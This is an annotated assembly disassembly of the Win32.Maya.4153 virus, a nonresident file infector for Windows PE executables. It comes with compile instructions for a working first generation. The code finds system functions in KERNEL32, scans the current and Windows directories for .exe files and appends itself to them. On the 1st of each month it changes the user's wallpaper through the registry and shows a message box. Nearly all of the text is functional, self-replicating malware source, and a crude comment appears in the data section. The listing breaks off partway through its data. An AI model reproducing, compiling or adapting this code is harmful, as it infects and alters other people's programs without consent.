;
;		  Win32.Maya.4153 virus
;		disassembly done by peon
;
; Maya is a nonresident PE infector,which searches for victims in the current,
; and the windows directories.It may infect up to 10 files per round(or so).
; On the 1st of any month,infected files display a messagebox and
; set the wallpaper to 'SLAM'.Uses memory mapped files.
; On start,Maya scans the host's imports for GetModuleHandleA for its purposes,
; then looks up apis and searches for exe's in the current and windows
; dirs.Appends itself to the end of the exe's by enlarging the last section
; of the file.Size growth is 4153 bytes (filesize rounded up to file alignment).
; Infection mark is 'WM' in the checksum field of the dos exe header.
; (Files that cant be infected will carry this however)
; Has minor bugs (treats exe header field 3Ch as a word (16bit) etc etc).
; Seems to contain code that is never executed(possibly inclomplete)
;
;
; note:ignore the @xxxx stuff.They were important only while disassembling
; note2:you will notice that the host's entry point is hardcoded to 3000h
; if you compile with Borland stuff,that doesnt make a difference but
; otherwise you might face problems running the first generation.
;
;compilation:
;tasm32 /m /ml wm.asm
;tlink32 wm,,,import32.lib /Tpe
; ..and
;pewrsec wm.exe
; ...to avoid page faults of 1st generation
;

.386			;i do not comment these
.model flat		;because i guess these are well-known
			;and boring


extrn ExitProcess:proc			;1st generation needs this

extrn GetModuleHandleA:proc		;maya needs that the host imports
					;this function

;
;define two structures so need no includes
;
_find_data struc		;finddata structure for file searches
	_attr dd ?
	_creatlo dd ?
	_creathi dd ?
	_lastalo dd ?
	_lastahi dd ?
	_lastwlo dd ?
	_lastwhi dd ?
	_sizehi dd ?
	_sizelo dd ?
	_res0 dd ?
	_res1 dd ?
	_fname db 260 dup(?)		;the only important field for us
	_altname db 14 dup (?)		
_find_data ends

win32systime struc	;system time structure for payload checking
	wyear dw ?
	wmonth dw ?
	wdow dw ?
	wday dw ?	;we are interested in checking the day
	whour dw ?
	wmin dw ?
	wsec dw ?
	wmillisec dw ?
win32systime ends


.code
;------------------- viral code begins here -----------------------

maya_length equ maya_end-maya_start	;size of viral code
maya_start equ $

;
;calculate delta offset and get a handle to KERNEL32.dll
;
maya:
	push ebp		;store ebp on stack
	call maya_flexible_entry;flexible entry point
maya_flexible_entry:
	pop ebp			;will calculate delta offset
	mov ebx,ebp
	sub ebp,offset maya_flexible_entry
	mov eax,1000h		;RVA of viral section,hardcoded
maya_rva_of_viral_section equ $-4
	add eax,6		;
	sub ebx,eax		;got imagebase
	mov [ebp+offset maya_imagebase],ebx	;store imagebase
	mov edx,offset maya_getmodulehandlea
	add edx,ebp		;fetch ptr to 'GetModulaHandleA' string
	mov ecx,[ebp+offset maya_getmodulehandlea_len] ;fetch string length
	push ebp		;save delta
	call maya_lookup_getmodulehandle	;search for import in host
	pop ebp			;get delta bk
	cmp eax,-1		;failed?
	jz maya_restart_host	;yes,abort
	mov [ebp+offset maya_getmodulehandlea_add],eax	;store address
	push ebp		;push delta
	mov ebx,offset maya_k32	;fetch ptr to 'KERNEL32.dll' string
	add ebx,ebp		;add delta
	push ebx		;store parameter
	call eax		;call GetModuleHandleA('KERNEL32.dll')
	pop ebp			;get delta bk
	mov [ebp+offset maya_addof_k32],eax	;store add off K32
;
;look up api's
;
	mov edi,offset maya_getmodulehandlea_len ;add of length of 1st string
	add edi,ebp		;plus delta offset
maya_lookup_loop:
	mov ecx,[edi]		;get string length
	cmp ecx,'MAYA'		;end of api names?		
	jz maya_lookup_done	;yes
	add edi,4		;skip length of string
	mov edx,edi		;store ptr
	add edi,ecx		;edi points to where we want result
	push edi
	call maya_get_apis	;look up api
	pop edi
	mov [edi],eax		;store add
	add edi,4		;go to add of next
	jmp maya_lookup_loop	;and branch
maya_lookup_done:
	mov dword ptr [ebp+offset maya_infection_counter],0	;kill counter
;
;search for executables and infect them
;
	call maya_process_current_directory
	call maya_process_windows_directory
;
;lookup a few more apis--possibly incomplete
;
	call maya_lookup_more
;
;payload check
;
	call maya_payload
;
;jump to host
;
maya_restart_host:	
	mov eax,[ebp+offset maya_entry_of_host]	;get host entry rva
	add eax,[ebp+offset maya_imagebase]	;add imagebase
	pop ebp					;restore ebp
	push eax				;save return address
	ret					;and jump to host
;
;get api addresses needed for infection
;
maya_get_apis:
	mov esi,[ebp+offset maya_addof_k32] ;get add of K32
	cmp word ptr [esi],'ZM'		;is it an exe?
	jne maya_get_apis_return_failure;nope,abort
	xor eax,eax			;zero register
	mov ax,[esi+3ch]		;ptr to PE header
	add eax,[ebp+offset maya_addof_k32];plus K32 base
	xchg esi,eax			;into esi
	cmp word ptr [esi],'EP'		;is it a PE?
	jne maya_get_apis_return_failure;nope,abort
	mov esi,[esi+78h]		;get exports rva in K32
	add esi,[ebp+offset maya_addof_k32];plus K32 base
	mov eax,[esi+1ch]
	add eax,[ebp+offset maya_addof_k32]
	mov [ebp+offset maya_eat],eax	;store it
	mov eax,[esi+20h]		;ptrs to exported names
	add eax,[ebp+offset maya_addof_k32]
	mov [ebp+offset maya_expnames],eax	;store it
	mov eax,[esi+24h]		;ptrs to export ordinals
	add eax,[ebp+offset maya_addof_k32]
	mov [ebp+offset maya_eord],eax	;store it
	xor eax,eax			;zero register
maya_get_apis_loop:
	push ecx			;save string length
	mov esi,edx			;esi=ptr to name that is searched for
	mov edi,[ebp+offset maya_expnames];ptr to exported names
	add edi,eax	
	mov edi,[edi]			;fetch ptr to exported fuction name
	add edi,[ebp+offset maya_addof_k32]	;add K32 base
	repe				;compare names
	cmpsb
	cmp ecx,0			;perfect match?
	je maya_get_apis_found		;yes
	add eax,4			;nope,proceed with next
	pop ecx				;get string length back
	jmp maya_get_apis_loop		;and compare with next name in K32
maya_get_apis_found:	
	pop ecx				;remove ecx from stack
	shr eax,1			;halve eax
	add eax,[ebp+offset maya_eord]	;fix ptr to eord's
	xor ebx,ebx			;zero ebx
	mov bx,[eax]			;fetch eord
	shl ebx,2			;*4
	add ebx,[ebp+offset maya_eat]	;add exports add table offset
	mov eax,[ebx]			;get rva of function
	add eax,[ebp+offset maya_addof_k32];add base of K32
	ret				;and return to caller
maya_get_apis_return_failure:
	mov eax,-1			;return failure to caller
	ret
;
;searches the host's imports for GetModuleHanldeA
;
maya_lookup_getmodulehandle:
	mov esi,[ebp+offset maya_imagebase]	;get imagebase
	cmp word ptr [esi],'ZM'			;host file must be exe	
	jne maya_lookup_getmodulehandle_return_failure ;but it isnt so abort
	xor eax,eax				;zero reg
	mov ax,[esi+3ch]			;ptr to PE head
	mov esi,eax				;into esi
	add esi,[ebp+offset maya_imagebase]	;add imagebase
	cmp word ptr [esi],'EP'			;is it a PE?
	jne maya_lookup_getmodulehandle_return_failure ;nope,abort
	mov esi,[esi+80h]			;get imports rva
	add esi,[ebp+offset maya_imagebase]	;add imagebase
	mov eax,esi
maya_lookup_getmodulehandle_dll_loop:
	mov esi,eax
	mov esi,[esi+0ch]			;name rva of dll module
	add esi,[ebp+offset maya_imagebase]	;add imagebase
	cmp [esi],'NREK'			;is module name 'KERN...'?
	je maya_lookup_getmodulehandle_dll_ok	;yes
	add eax,14h				;next entry
	jmp maya_lookup_getmodulehandle_dll_loop;check next
maya_lookup_getmodulehandle_dll_ok:
	mov esi,eax
	mov eax,[esi+10h]			;import lookup table rva
	add eax,[ebp+offset maya_imagebase]	;add imagebase
	mov [ebp+offset maya_ilt],eax		;store ilt rva
	cmp dword ptr [esi],0			;
	je maya_lookup_getmodulehandle_return_failure
	mov esi,[esi]				;
	add esi,[ebp+offset maya_imagebase]	;add imagebase
	mov ebx,esi				;store ptr
	xor eax,eax				;zero reg
maya_lookup_getmodulehandle_function_loop:
	cmp dword ptr [ebx],0
	je maya_lookup_getmodulehandle_return_failure
	cmp byte ptr [ebx+3],80h
	je maya_lookup_getmodulehandle_nextfunction
	mov esi,[ebx]
	add esi,[ebp+offset maya_imagebase]
	add esi,2
	mov edi,edx
	push ecx
	repe
	cmpsb				;compare function names
	cmp ecx,0			;match?
	pop ecx
	je maya_lookup_getmodulehandle_done ;yes
maya_lookup_getmodulehandle_nextfunction:
	inc eax
	add ebx,4
	jmp maya_lookup_getmodulehandle_function_loop	
maya_lookup_getmodulehandle_done:
	shl eax,2			;*4
	add eax,[ebp+offset maya_ilt]
	mov ebx,eax
	mov eax,[eax]			;got the add
	ret				;so return to the caller
maya_lookup_getmodulehandle_return_failure:
	mov eax,-1			;show that we failed
	ret				;and return to the caller
;
;file infection subroutine
;
maya_infect:			;@11F3
	mov dword ptr[ebp+offset maya_successfull_infection],0	;kill flag
	call maya_getfileattrs				;get file attr
	mov [ebp+offset maya_fileattrib],eax		;store it
	push edx					;ptr to filename
	mov eax,80h					;normal attr
	call maya_setfileattrs
	pop edx
	push edx
	call maya_openfile				;open file
	cmp eax,-1					;failed?
	je maya_infect_restore_attr			;yes,abort
	mov [ebp+offset maya_handle],eax		;store handle
	call maya_getfsize	
	cmp eax,-1					;failed?
	je maya_infect_closefile			;yes,abort
	cmp dword ptr [ebp+offset maya_filesize_high_dword],0 ;file smaller
							      ; than 4 GB?		
	jne maya_infect_closefile			;nope abort
	xchg ecx,eax
	mov [ebp+offset maya_filesize],ecx		;store filesize
	mov eax,[ebp+offset maya_handle]		;get handle
	mov ecx,[ebp+offset maya_filesize]		;get filesize
	add ecx,maya_length+1000h			;add virus size+1000h
	call maya_createfmap				;create file mapping
	cmp eax,0					;failed?
	je maya_infect_closemap				;yes,abort
	mov [ebp+offset maya_maphandle],eax		;store handle
	mov ecx,[ebp+offset maya_filesize]		;get size of victim
	add ecx,maya_length+1000h
	call maya_mapview				;MapViewOfFile()
	cmp eax,0					;failed?
	je maya_infect_closemap				;yes,abort
	mov [ebp+offset maya_mappedadd],eax		;store ptr
	mov esi,eax					;and load into esi
	cmp word ptr [esi],'ZM'				;EXE?
	jne maya_infect_unmap
	cmp word ptr [esi+12h],'MW'			;WM in the checksum
	je maya_infect_unmap				;field?(already inf'd)
	mov word ptr [esi+12h],'MW'			;mark infected
	xor eax,eax
	mov ax,[esi+3ch]				;ptr to PE header
	cmp ax,0					;no PE header?
	je maya_infect_unmap
	cmp eax,maya_filesize				;header located
;***							;beyond eof?
;bug:should be cmp eax,[ebp+maya_filesize] for proper operation
;***
	jnc maya_infect_unmap				;yes abort
	add eax,[ebp+offset maya_mappedadd]		;get add of mapped
	mov esi,eax					;PE header
	cmp word ptr [esi],'EP'				;PE?	
	jne maya_infect_unmap				;nope abort
	mov [ebp+offset maya_peptr],eax			;store ptr to PE head
	mov eax,[esi+3ch]				;get filealign
	mov [ebp+offset maya_filealign],eax		;store it
	mov eax,[ebp+offset maya_entry_of_host]		;get current host entry
	mov [ebp+offset maya_olderva],eax		;store it
	mov eax,[esi+28h]				;get victim entry rva
	mov [ebp+offset maya_entry_of_host],eax		;store it
	mov eax,[esi+74h]
	shl eax,3					;*8	
	add eax,[ebp+offset maya_peptr]
	add eax,78h
	xor ecx,ecx					;zero register
	mov cx,[esi+6]					;get object count
maya_infect_setwbit:	;@1318
	or dword ptr [eax+24h],80000000h		;set W bit of sections
	add eax,28h					;next section...
	loop maya_infect_setwbit
	sub eax,28h					;ptr to last entry	
	mov [ebp+offset maya_ptrtolastsection],eax	;store it	
	mov edi,eax					;ptr into edi
	mov eax,[edi+10h]				;get section PhysSize
	mov [ebp+offset maya_sectps],eax		;store it
	add eax,[edi+0ch]				;plus section rva
	mov [ebp+offset maya_rva_of_viral_section],eax	;patch code
	mov [ebp+offset maya_sectrva],eax		;store it
	push edi
	mov eax,[edi+14h]				;get section PhysOffs
	add eax,[ebp+offset maya_mappedadd]		;get ptr to raw
							;data of last section
	add eax,[edi+10h]				;add PhysSize
	mov edi,eax					;load ptr into edi
	mov esi,offset maya_start			;get virus start add
	add esi,ebp					;add delta offset
	mov ecx,maya_length				;length of code
	cld						;increase pointers
	rep						;move viral code..
	movsb						;..into the mapped..
	pop edi						;..executable
	add dword ptr [edi+10h],maya_length		;update..
							;..sectionPhysSize
	add dword ptr [ebp+offset maya_filesize],maya_length	;and filesize	
	xor edx,edx					;zero edx
	mov eax,[edi+10h]				;get section PhysSize
	mov ecx,[ebp+offset maya_filealign]
	push ecx					;calculates section..
	div ecx						;..PhysSize with respect
	pop ecx						;to file alignment unit
	sub ecx,edx					;calculate padding
	add [edi+10h],ecx				;and add to PhysSize
	add [ebp+offset maya_filesize],ecx
	mov eax,[edi+10h]				;get updated PhysSize
	mov [edi+8],eax					;set virtual size
	or dword ptr [edi+24h],20h			;set Code flag
	or dword ptr [edi+24h],20000000h		;set Executable flag
	mov esi,[ebp+offset maya_peptr]			;get ptr to PE head
	mov eax,[ebp+offset maya_sectrva]		;get rva of last section
	mov [esi+28h],eax				;set new entry point
	mov eax,[edi+0ch]				;get section rva
	add eax,[edi+10h]				;add section PhysSize
	mov [esi+50h],eax				;set imagesize
	mov eax,[ebp+offset maya_olderva]		;get current host entry
	mov [ebp+offset maya_entry_of_host],eax		;restore it
	mov dword ptr[ebp+offset maya_successfull_infection],1
							;set flag
maya_infect_unmap:	;@13D0
	mov eax,[ebp+offset maya_mappedadd]
	call maya_unmapview			;call UnmapViewOfFile
maya_infect_closemap:	;@13DB
	mov eax,[ebp+offset maya_maphandle]	;call CloseHandle
	call maya_closefile	
	mov eax,[ebp+offset maya_handle]	
	mov ecx,[ebp+offset maya_filesize]	
	call maya_setfilepo			;set file pointer to end
	cmp eax,-1
	je maya_infect_closefile
	mov eax,[ebp+offset maya_handle]
	call maya_seteof			;and set end of file
maya_infect_closefile:
	mov eax,[ebp+offset maya_handle]
	call maya_closefile			;finally close file
maya_infect_restore_attr:
	pop edx					;ptr to filename
	mov eax,[ebp+offset maya_fileattrib]
	call maya_setfileattrs			;restore attributes
	ret					;and return to caller
;
;subroutines used during infection
;
maya_openfile:		;@141F
	push ebp
	push 0
	push 80h
	push 3
	push 0
	push 1
	push 0C0000000h
	push edx
	mov eax,[ebp+offset maya_createfilea_add]
	call eax
	pop ebp
	ret
maya_closefile:		;@143D
	push ebp
	push eax
	mov eax,[ebp+offset maya_closehandle_add]
	call eax
	pop ebp
	ret
maya_createfmap:	;@1449
	push ebp
	push 0
	push ecx
	push 0
	push 4
	push 0
	push eax
	mov eax,[ebp+offset maya_createfilemappinga_add]
	call eax
	pop ebp
	ret
maya_mapview:		;@145E
	push ebp
	push ecx
	push 0
	push 0
	push 2
	push eax
	mov eax,[ebp+offset maya_mapviewoffile_add]
	call eax
	pop ebp
	ret
maya_unmapview:		;@1471
	push ebp
	push eax
	mov eax,[ebp+offset maya_unmapviewoffile_add]
	call eax
	pop ebp
	ret
maya_setfilepo:		;@147D
	push ebp
	push 0
	push 0
	push ecx
	push eax
	mov eax,[ebp+offset maya_setfilepointer_add]
	call eax
	pop ebp
	ret
maya_seteof:		;@148E
	push ebp
	push eax
	mov eax,[ebp+offset maya_setendoffile_add]
	call eax
	pop ebp
	ret
maya_getfsize:		;@149A
	push ebp
	mov ebx,offset maya_filesize_high_dword ;get add of room for
	add ebx,ebp				;hi dword of filesize
	push ebx				;store ptr
	push eax				;store handle
	mov eax,[ebp+offset maya_getfilesize_add];get fn add
	call eax		;call fn
	pop ebp
	ret
maya_getfileattrs:		;@14AE
	push ebp
	push edx
	push edx		;store filename as param
	mov eax,[ebp+offset maya_getfileattributesa_add]
	call eax		;call function
	pop edx
	pop ebp
	ret
maya_setfileattrs:		;@14BC
	push ebp
	push eax		;store params
	push edx
	mov eax,[ebp+offset maya_setfileattributesa_add]
	call eax		;call fn
	pop ebp
	ret
maya_getcurrdir:		;@14C9
	push ebp
	push eax		;ptr to buffer
	push 80h		;buffer size
	mov eax,[ebp+offset maya_getcurrentdirectorya_add]
	call eax
	pop ebp
	ret
maya_setcurrdir:		;@14DA
	push ebp
	push eax		;ptr to path
	mov eax,[ebp+offset maya_setcurrentdirectorya_add]
	call eax
	pop ebp
	ret
maya_getwindir:			;@14E6
	push ebp
	push 80h		;buffer size
	push eax		;ptr to buffer
	mov eax,[ebp+offset maya_getwindowsdirectorya_add]
	call eax
	pop ebp
	ret
maya_getsystime:		;@14F7
	push ebp
	mov eax,offset maya_systime
	add eax,ebp	
	push eax		;store ptr to structure to be filled
	mov eax,[ebp+offset maya_getsystemtime_add]
	call eax		;call fn
	pop ebp
	ret
maya_getmodhand:		;@150A
	push ebp
	push eax
	mov eax,[ebp+offset maya_getmodulehandlea_add]
	call eax
	pop ebp
	ret
maya_getprocadd:		;@1516
	push ebp
	push edx		;ptr to fn name
	push eax		;hModule
	mov eax,[ebp+offset maya_getprocaddress_add]
	call eax
	pop ebp
	ret
;
;
;
maya_lookup_more:	;@1523
	mov edi,offset maya_movefilea_len	;ptr to more api names
	add edi,ebp				;plus delta offset
maya_lookup_more_loop:		;loop begins here
	mov ecx,[edi]		;get length of name string
	cmp ecx,'SHAI'		;end of api names?	
	je maya_lookup_more_return	;yes
	add edi,4		;skip length of string
	mov edx,edi		;edx points to api name
	push edi		;save regs
	push ecx
	push ebp
	call maya_lookup_getmodulehandle	;get fn add
;this call will fail or virus causes a fault at line 579
	pop ebp			;get regs back
	pop ecx
	pop edi
	add edi,ecx		;get ptr to room for address,after api name
	cmp eax,-1
	je maya_lookup_more_nextfn
	mov [edi],eax		;store fn add
	mov eax,[edi+4]
	add eax,ebp
	mov [ebx],eax
maya_lookup_more_nextfn:
	add edi,8		;next
	jmp maya_lookup_more_loop
maya_lookup_more_return:	;@1559
	ret
;
;the following code is probaly dead
;
maya_deadcode:
	pushad
	call maya_deadcode_calculate_deltaoffset
	add ecx,28h
	mov edx,[esp+ecx]
	call maya_deadcode_extension_check
	cmp eax,1
	jne maya_deadcode_skip
	call maya_infect
maya_deadcode_skip:
	popad
	ret		

maya_deadcode_extension_check:
	mov esi,edx		;get filename ptr into esi
	cld			;increase ptrs
maya_deadcode_extension_check_loop:
	lodsb			;fetch character of filename
	cmp al,0		;null?
	je maya_deadcode_extension_check_ret0	;yes abort
	cmp al,'.'		;dot?
	jne maya_deadcode_extension_check_loop	;nope branch to find dot
	cmp dword ptr [esi-1],'EXE.';extension check
	je maya_deadcode_extension_check_ret1
	cmp dword ptr [esi-1],'exe.';extension check
	je maya_deadcode_extension_check_ret1
maya_deadcode_extension_check_ret0:
	xor eax,eax		;return failure
	ret
maya_deadcode_extension_check_ret1:
	mov eax,1		;return success
	ret
;@159x
;
;these calls dont seem to be executed
;
maya_deadcode_call1 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_movefilea_add]
maya_deadcode_call2 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_copyfilea_add]
maya_deadcode_call3 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_createfilea2_add]
maya_deadcode_call4 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_deletefilea_add]
maya_deadcode_call5 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_setfileattributesa2_add]
maya_deadcode_call6 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_getfileattributesa2_add]
maya_deadcode_call7 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_getfullpathnamea_add]
maya_deadcode_call8 equ $
	call maya_deadcode_hook
	jmp [ecx+offset maya_createprocessa_add]

maya_deadcode_hook:
	mov ecx,4
	call maya_deadcode
	push ebp
	call maya_deadcode_calculate_deltaoffset
	mov ecx,ebp
	pop ebp
	ret

maya_deadcode_calculate_deltaoffset:
	call $+5
maya_deadcode_calculate_deltaoffset_plus5:
	pop ebp
	sub ebp,offset maya_deadcode_calculate_deltaoffset_plus5
	ret	
;
;file searching routines
;
maya_process_windows_directory:
	mov dword ptr[ebp+offset maya_infection_counter],0	;kill counter
	call maya_process_current_directory	;attack current dir again		
	cmp dword ptr[ebp+offset maya_infection_counter],5 ;inf'd 5 files again?
	je maya_process_windows_directory_return	;if so return
	mov eax,offset maya_currdir
	add eax,ebp
	call maya_getcurrdir
	cmp eax,0
	je maya_process_windows_directory_return
	mov eax,offset maya_windir
	add eax,ebp
	call maya_getwindir
	cmp eax,0
	je maya_process_windows_directory_return
	mov eax,offset maya_windir
	add eax,ebp
	call maya_setcurrdir
	cmp eax,0
	je maya_process_windows_directory_return
	call maya_process_current_directory
	mov eax,offset maya_currdir
	add eax,ebp
	call maya_setcurrdir
maya_process_windows_directory_return:
	ret				;return to caller
;
;routine to scan for and infect files in the current directory
;
maya_process_current_directory:		;@1674
	push ebp
	mov eax,offset maya_finddata	;get add of structure
	add eax,ebp			;add delta offset
	push eax			;store parameter
	mov eax,offset maya_filemask	;get add of filemask
	add eax,ebp			;add delta offset
	push eax			;store parameter
	mov eax,[ebp+offset maya_findfirstfilea_add];get add of FindFirstFileA
	call eax			;call function
	pop ebp
	cmp eax,-1			;failed?
	je maya_process_current_directory_return;yes
	mov [ebp+offset maya_findhandle],eax	;store handle
	mov edx,offset maya_finddata._fname	;get ptr to filename
	add edx,ebp				;add delta offset
	call maya_infect			;try to infect file	
	cmp dword ptr[ebp+offset maya_successfull_infection],1	;check flag
	jne maya_process_current_directory_findnext
	inc dword ptr[ebp+offset maya_infection_counter]	;increment counter
	cmp dword ptr[ebp+offset maya_infection_counter],5;already infected 5 files?
	je maya_process_current_directory_return ;yes so return to caller
maya_process_current_directory_findnext:
	push ebp
	mov eax,offset maya_finddata	;get add of structure
	add eax,ebp			;add delta offset
	push eax			;store parameter				
	push dword ptr[ebp+offset maya_findhandle]	;store parameter
	mov eax,[ebp+offset maya_findnextfilea_add]	;get add of FindNextFileA
	call eax				;call function
	pop ebp	
	cmp eax,0				;found more?
	je maya_process_current_directory_return;nope
	mov edx,offset maya_finddata._fname	;get filename
	add edx,ebp				;add delta offset
	call maya_infect			;try to infect file
	cmp dword ptr[ebp+offset maya_successfull_infection],1 ;inf ok?
	jne maya_process_current_directory_findnext   ;nope proceed
	inc dword ptr[ebp+offset maya_infection_counter]	      ;inc counter
	cmp dword ptr[ebp+offset maya_infection_counter],5     ;already 5?
	je maya_process_current_directory_return      ;yes return to caller
	jmp maya_process_current_directory_findnext   ;nope find more files
maya_process_current_directory_return:
	ret						;return to caller

maya_payload:		;@1701
;
;on the 1st of any month,creates a slam.bmp file containing a SLAM logo
;and sets the wallpaper to it.Then displays a messagebox.
;
	call maya_getsystime		;fill system time structure
	cmp word ptr[ebp+offset maya_systime.wday],1 ;1st of any month?
	jne maya_payload_return			;nope abort
	mov eax,offset maya_user32		;ptr to 'USER32.dll' string
	add eax,ebp				;add delta offset
	call maya_getmodhand			;get hModule to user32
	cmp eax,0				;failed?
	je maya_payload_return			;yes abort
	mov [ebp+offset maya_u32hand],eax	;store hModule to user32
	mov eax,offset maya_advapi32		;ptr to 'ADVAPI32.dll' string
	add eax,ebp				;add delta offset
	call maya_getmodhand			;get hModule
	cmp eax,0				;failed?
	je maya_payload_return			;yes abort
	mov [ebp+offset maya_a32hand],eax	;store hModule	
	mov edx,offset maya_regopenkeyexa	;get ptr
	add edx,ebp				;add delta offset
	mov eax,[ebp+offset maya_a32hand]	;get handle to advapi32
	call maya_getprocadd			;get add of RegOpenKeyExA fn
	cmp eax,0				;failed?
	je maya_payload_return			;yes abort
	mov [ebp+offset maya_regopenkeyexa_add],eax ;store add
;
;now gets the address of 3 more fn's:RegSetVauleExA,MessageBoxA,
;and SystemParametersInfo.It is identical to the method above,
;so i dont waste time commenting it
;
	mov edx,offset maya_regsetvalueexa	;asciiz of fn
	add edx,ebp
	mov eax,[ebp+offset maya_a32hand]
	call maya_getprocadd
	cmp eax,0
	je maya_payload_return
	mov [ebp+offset maya_regsetvalueexa_add],eax ;store add
	mov edx,offset maya_messageboxa		;asciiz of fn
	add edx,ebp
	mov eax,[ebp+offset maya_u32hand]
	call maya_getprocadd
	cmp eax,0
	je maya_payload_return
	mov [ebp+offset maya_messageboxa_add],eax	;store add
	mov edx,offset maya_sysparam
	add edx,ebp					;add delta offset
	mov eax,[ebp+offset maya_u32hand]	;get handle to user32.dll
	call maya_getprocadd		;call fn
	cmp eax,0			;failed?
	je maya_payload_return		;yes abort
;
;creates the .bmp file
;
	mov [ebp+offset maya_sysparam_add],eax
	push 0			;hTemplate is null
	push 80h		;attribute normal
	push 2			;create always,overwrite if exists
	push 0			;no security attrs struct,so we pass null
	push 1			;share_read
	push 40000000h		;generic write access
	mov eax,offset maya_slamfilename;ptr to filename
	add eax,ebp		;add delta offset
	push eax		;ptr to filename
	mov eax,[ebp+offset maya_createfilea_add];get fn add
	call eax				;call CreateFileA()
	cmp eax,-1				;failed?
	je maya_payload_return			;yes abort
	mov [ebp+offset maya_slamhandle],eax	;store handle	
	push 0				;null as overlapped ptr to WriteFile
	mov eax,offset maya_numberofwritten	;add of room
						;for # of written bytes
	add eax,ebp				;plus delta offset
	push eax				;store parameter
	push dword ptr slam_len			;length of .bmp
	mov eax,offset slam			;ptr to .bmp
	add eax,ebp				;plus delta offset
	push eax				;store parameter
	push dword ptr [ebp+offset maya_slamhandle] ;store handle for WriteFile
	mov eax,[ebp+offset maya_writefile_add]	;get add of fn
	call eax				;call fn
	push dword ptr[ebp+offset maya_slamhandle];push handle
	mov eax,[ebp+offset maya_closehandle_add];get fn add
	call eax				;call fn
;
;registry manipulations to modify wallpaper
;
	mov eax,offset maya_reg			;address of result
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 2					;desired access:KEY_SET_VALUE
	push 0					;reserved,must be null
	mov eax,offset maya_cpd			;ptr to 'Control Panel\Desktop'
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 80000001h				;HKEY_CURRENT_USER
	mov eax,[ebp+offset maya_regopenkeyexa_add];get fn address
	call eax				;call RegOpenKeyExA
	push 2					;size of value data
	mov eax,offset maya_one			;'1' character
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 1					;type of data:1=zero terminated
						;string
	push 0					;reserved,must be null
	mov eax,offset maya_tilewallpaper	;ptr to 'Tilewallpaper'
	add eax,ebp				;add delta offset
	push eax				;value name to set
	push dword ptr [ebp+offset maya_reg]	;hKey
	mov eax,[ebp+offset maya_regsetvalueexa_add]
	call eax				;call fn
	push 2					;size of value data
	mov eax,offset maya_zero		;'0' character
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 1					;data type
	push 0					;reserved
	mov eax,offset maya_wallpaperstyle	;ptr to value name
	add eax,ebp				;add delta offset
	push eax				;pass param
	push dword ptr[ebp+offset maya_reg]	;hKey
	mov eax,[ebp+offset maya_regsetvalueexa_add];get fn add
	call eax				;call fn
	push 0
	mov eax,offset maya_slamfilename	;file containing .bmp
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 0
	push 14h				;SPI_SETDESKWALLPAPER
	mov eax,[ebp+offset maya_sysparam_add]	;get fn add
	call eax				;call fn:update desktop
;
;messagebox
;
	push 30h				;MB_OK+MB_ICONEXCLAMATION style
	mov eax,offset maya_viralert		;title of msgbox
	add eax,ebp				;add delta offset
	push eax				;pass param
	mov eax,offset maya_mayamsg		;ptr to msg of msgbox
	add eax,ebp				;add delta offset
	push eax				;pass param
	push 0					;hWnd of caller (virus)
	mov eax,[ebp+offset maya_messageboxa_add]	;get fn add
	call eax				;call MessageBox fn
maya_payload_return:
	ret					;return to caller
;
;data related to virus
;

maya_msg	db 'To Aparna S. : Forever in love with you...'
;
;fuck all the motherfucking bitches
;

maya_addof_k32	dd 0		;address of KERNEL32.dll module
maya_imagebase	dd 0		;imagebase of host @18FC
maya_windir	db 128 dup(0)	;room for Windows directory ASCIIZ string @1900
maya_currdir	db 128 dup (0)	;room for current directory ASCIIZ string @1980
maya_systime	win32systime ;win32 system time structure @1A00
maya_finddata _find_data 	;finddata structure for file searches @1A10


maya_fileattrib			dd 0	;attribute of victim @1B58
maya_successfull_infection	dd 0	;flag that indicates the infection
					;routines completed operation @1B5C
maya_infection_counter	dd 0	;counter of infections @1B60
maya_eat		dd 0	;export address table
maya_expnames		dd 0	;exported names
maya_eord		dd 0	;exports ordinals
maya_ilt		dd 0	;import lookup table rva


maya_findhandle		dd 0	;handle used in file searches
maya_filemask	db '*.EXE',0	;filemask used to find victims @1B51

maya_filesize_high_dword	dd 0	;hi dword of filesize @1B74
maya_filesize			dd 0	;lo dword of filesize @1B78
maya_handle		dd 0	;handle of file being infected	@1B7C
maya_maphandle		dd 0	;handle of filemapping object	@1B80
maya_mappedadd		dd 0	;address where file is mapped	@1B84
maya_peptr		dd 0	;PE head ptr			@1B88
maya_ptrtolastsection	dd 0	;ptr to last entry in section table @1B8C
maya_filealign		dd 0	;file alignment unit size	@1B90
maya_entry_of_host	dd 3000h	;host entry rva  @1B94
; yikes--hardcoded for 1st generation:)

maya_sectrva		dd 0	;rva of viral section	 @1B98
maya_olderva		dd 0	;temporary storage of host entry point @1B9C
maya_sectps		dd 0	;PhysSize of last section @1BA0
maya_k32	db 'KERNEL32.dll',0	;@1BA4
;
;api names
;
maya_getmodulehandlea_len	dd 17		;@1BB1
maya_getmodulehandlea		db 'GetModuleHandleA',0
maya_getmodulehandlea_add	dd 0

maya_getprocaddress_len		dd 15
maya_getprocaddress		db 'GetProcAddress',0
maya_getprocaddress_add		dd 0

maya_createfilea_len		dd 12
maya_createfilea		db 'CreateFileA',0
maya_createfilea_add		dd 0

maya_writefile_len		dd 10
maya_writefile			db 'WriteFile',0
maya_writefile_add		dd 0

maya_getfilesize_len		dd 12
maya_getfilesize		db 'GetFileSize',0
maya_getfilesize_add		dd 0

maya_createfilemappinga_len	dd 19
maya_createfilemappinga		db 'CreateFileMappingA',0
maya_createfilemappinga_add	dd 0

maya_mapviewoffile_len		dd 14
maya_mapviewoffile		db 'MapViewOfFile',0
maya_mapviewoffile_add		dd 0

maya_unmapviewoffile_len	dd 16
maya_unmapviewoffile		db 'UnmapViewOfFile',0
maya_unmapviewoffile_add	dd 0

maya_closehandle_len		dd 12
maya_closehandle		db 'CloseHandle',0
maya_closehandle_add		dd 0

maya_findfirstfilea_len		dd 15
maya_findfirstfilea		db 'FindFirstFileA',0
